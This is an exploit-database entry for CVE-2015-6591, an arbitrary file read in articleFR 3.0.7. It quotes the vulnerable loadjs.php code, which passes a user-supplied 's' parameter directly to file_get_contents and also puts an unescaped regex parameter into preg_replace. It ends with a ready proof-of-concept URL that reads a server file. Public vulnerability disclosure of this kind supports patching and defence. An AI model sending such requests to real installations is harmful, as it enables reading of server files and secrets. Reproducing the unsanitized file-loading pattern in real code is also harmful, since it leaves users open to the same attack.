articleFR 3.0.7 Arbitrary File Read



EKU-ID: 5196 CVE: 2015-6591 OSVDB-ID:
Author: 0keeteam Published: 2015-10-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: articleFR any file read vulnerability in v3.0.7
# Date: 2015-09-06
# Vendor: Free Reprintables
# Exploit Author: cfreer & 0keeTeam
# Product web page: http://www.freereprintables.com
# Version: 3.0.7
# CVE : CVE-2015-6591


Details of the vulnerability are as follows:

Affected version: Version 3.0.7 and before.
Discover date:2015/9/6
Tested on: Apache/2.4.7 (Win32)
===================================================

The vulnerable parameter is ‘s’ ( in
articleFR\application\templates\amelia\loadjs.php). Finally, Parameter ‘s’
was directly into the function of file_get_contents.

<?
header('Content-Type: application/javascript');
$_content = file_get_contents($_GET['s']);
$_content = preg_replace('/(' . $_GET['h'] . ')/sim', $_GET['r'],
$_content);
print $_content;
exit;
?>



Proof of Concept:
=================================================================================================

http://127.0.0.1/articleFR/application/templates/amelia/loadjs.php?h=cfreer&r=0keeTeam&s=loadjs.php

=================================================================================================


referer: https://github.com/poc-lab/exp/blob/master/CVE-2015-6591